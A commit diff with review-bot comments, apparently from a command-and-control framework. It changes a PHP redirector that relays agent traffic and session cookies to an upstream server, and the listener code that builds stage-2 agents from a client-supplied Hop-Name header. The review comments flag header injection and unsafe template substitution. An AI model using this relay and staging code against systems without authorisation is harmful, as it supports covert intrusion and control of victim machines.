parent
619ae2c132
commit
6c3f51aca9
|
@ -1,18 +1,22 @@
|
|||
<?php
|
||||
|
||||
$server = rtrim("REPLACE_SERVER", '/');
|
||||
$hopName = "REPLACE_HOP_NAME";
|
||||
|
||||
|
||||
function do_get_request($url, $optionalHeaders = null)
|
||||
{
|
||||
global $hopName;
|
||||
$aContext = array(
|
||||
'http' => array(
|
||||
'method' => 'GET'
|
||||
),
|
||||
);
|
||||
$headers = array('Hop-Name' => $hopName);
|
||||
if ($optionalHeaders !== null) {
|
||||
$aContext['http']['header'] = $optionalHeaders;
|
||||
$headers['Cookie'] = $optionalHeaders;
|
||||
}
|
||||
$aContext['http']['header'] = prepareHeaders($headers);
|
||||
$cxContext = stream_context_create($aContext);
|
||||
echo file_get_contents($url, False, $cxContext);
|
||||
}
|
||||
|
@ -20,13 +24,16 @@ function do_get_request($url, $optionalHeaders = null)
|
|||
|
||||
function do_post_request($url, $data, $optionalHeaders = null)
|
||||
{
|
||||
global $hopName;
|
||||
$params = array('http' => array(
|
||||
'method' => 'POST',
|
||||
'content' => $data
|
||||
));
|
||||
$headers = array('Hop-Name' => $hopName);
|
||||
if ($optionalHeaders !== null) {
|
||||
$params['http']['header'] = $optionalHeaders;
|
||||
$headers['Cookie'] = $optionalHeaders;
|
||||
}
|
||||
$params['http']['header'] = prepareHeaders($headers);
|
||||
$ctx = stream_context_create($params);
|
||||
$fp = @fopen($url, 'rb', false, $ctx);
|
||||
if (!$fp) {
|
||||
|
@ -39,11 +46,24 @@ function do_post_request($url, $data, $optionalHeaders = null)
|
|||
echo $response;
|
||||
}
|
||||
|
||||
function prepareHeaders($headers) {
|
||||
$flattened = array();
|
||||
|
||||
foreach ($headers as $key => $header) {
|
||||
if (is_int($key)) {
|
||||
$flattened[] = $header;
|
||||
} else {
|
||||
$flattened[] = $key.': '.$header;
|
||||
}
|
||||
}
|
||||
|
||||
return implode("\r\n", $flattened);
|
||||
}
|
||||
|
||||
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
|
||||
$requestURI = $_SERVER['REQUEST_URI'];
|
||||
if(isset($_COOKIE['session'])) {
|
||||
return do_get_request($server.$requestURI, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||
return do_get_request($server.$requestURI, "session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||
}
|
||||
else {
|
||||
return do_get_request($server.$requestURI);
|
||||
|
@ -56,7 +76,7 @@ else {
|
|||
$postdata = file_get_contents("php://input");
|
||||
|
||||
if(isset($_COOKIE['session'])) {
|
||||
return do_post_request($server.$requestURI, $postdata, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||
return do_post_request($server.$requestURI, $postdata, "session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||
}
|
||||
else {
|
||||
return do_post_request($server.$requestURI, $postdata);
|
||||
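Review bot: The session cookie reaches the upstream request headers with only spaces replaced, so a CR or LF inside `$_COOKIE['session']` survives into the string that `prepareHeaders()` joins with `"\r\n"` and can add extra header lines to the request sent to `$server`. PHP URL-decodes cookie values, so an encoded line break in the incoming cookie arrives already decoded. `prepareHeaders()` should strip or reject line breaks in keys and values before appending, e.g. `$header = str_replace(array("\r", "\n"), '', $header);`, which covers both the GET and POST branches. If the `$aContext['http']['header'] = $optionalHeaders;` and `$params['http']['header'] = $optionalHeaders;` lines are still on the new side (the page has lost its +/- markers), they are dead stores, because the next statement overwrites the same key. `$optionalHeaders` now carries a cookie value, so it also deserves a new name or a one-line comment.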
|
|
|
@ -747,8 +747,16 @@ def send_message(packets=None):
|
|||
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
|
||||
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
|
||||
|
||||
hopListenerName = request.headers.get('Hop-Name')
|
||||
try:
|
||||
hopListener = helpers.get_listener_options(hopListenerName)
|
||||
tempListenerOptions = copy.deepcopy(listenerOptions)
|
||||
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
|
||||
except TypeError:
|
||||
tempListenerOptions = listenerOptions
|
||||
|
||||
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
|
||||
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
|
||||
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions)
|
||||
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
|
||||
# TODO: wrap ^ in a routing packet?
|
||||
|
||||
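Review bot: `Hop-Name` is taken from the incoming request and passed straight to `helpers.get_listener_options()`, so the client decides which listener's `Host` value is written into the generated agent. Nothing visible in this hunk checks that the named listener is a hop listener or is associated with this one. The `except TypeError` fallback presumably covers a missing header or unknown name (subscripting a `None` result), but an entry without a `Host` key would raise `KeyError` and escape it. An explicit test such as `if hopListener and 'Host' in hopListener:` with a fallback to `listenerOptions` would be clearer, and a short comment should say when the header is expected to be present. The enclosing function starts and ends outside the hunk.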
|
|
|
@ -440,6 +440,7 @@ def send_message(packets=None):
|
|||
f.close()
|
||||
|
||||
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
|
||||
hopCode = hopCode.replace('REPLACE_HOP_NAME', self.options['Name']['Value'])
|
||||
|
||||
saveFolder = self.options['OutFolder']['Value']
|
||||
for uri in uris:
|
||||
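Review bot: The listener name is substituted into the template as raw text and lands inside a double-quoted PHP string (`$hopName = "REPLACE_HOP_NAME";`), so a name containing `"`, `\` or `$` produces a broken or variable-interpolated script. The same value is later sent as an HTTP header, where line breaks would also matter. Validate `self.options['Name']['Value']` against a restricted character set before the `replace`, or escape it for a single-quoted PHP literal and switch the template to single quotes. The same applies to `redirectHost` on the line above. The enclosing function is only partly visible in this hunk.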
|
|